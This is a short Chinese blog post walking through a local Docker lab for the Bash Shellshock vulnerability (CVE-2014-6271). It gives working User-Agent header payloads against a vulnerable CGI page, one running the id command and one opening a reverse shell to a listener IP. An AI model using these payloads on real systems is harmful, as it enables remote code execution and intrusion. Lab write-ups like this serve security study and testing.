Bash Shellshock 破壳漏洞(CVE-2014-6271)

docker compose up -d

服务启动后,有两个页面`http://your-ip:8080/victim.cgi`和`http://your-ip:8080/safe.cgi`。其中safe.cgi是最新版bash生成的页面,victim.cgi是bash4.3生成的页面。

访问该网址

将payload附在User-Agent中访问victim.cgi

可见执行成功

User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

safe.cgi则不行

测试shell反弹

先开个监听

然后构造payload

User-Agent: () { :;};echo;echo $(/bin/ls -al /);/bin/bash -i >& /dev/tcp/192.168.150.138/7777 0>&1

  • 5
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值